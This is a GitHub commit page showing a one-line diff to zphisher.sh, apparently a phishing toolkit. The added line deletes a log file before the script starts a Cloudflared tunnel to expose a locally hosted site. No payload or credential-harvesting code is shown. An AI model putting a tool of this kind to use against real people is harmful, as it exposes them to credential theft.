We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
2 parents 75bc77c + d8ae171 commit 69d7aa3Copy full SHA for 69d7aa3
zphisher.sh
@@ -410,6 +410,7 @@ start_ngrok() {
410
411
## Start Cloudflared
412
start_cloudflared() {
413
+ rm .cld.log > /dev/null 2>&1 &
414
echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Initializing... ${GREEN}( ${CYAN}http://$HOST:$PORT ${GREEN})"
415
{ sleep 1; setup_site; }
416
echo -ne "\n\n${RED}[${WHITE}-${RED}]${GREEN} Launching Cloudflared..."
0 commit comments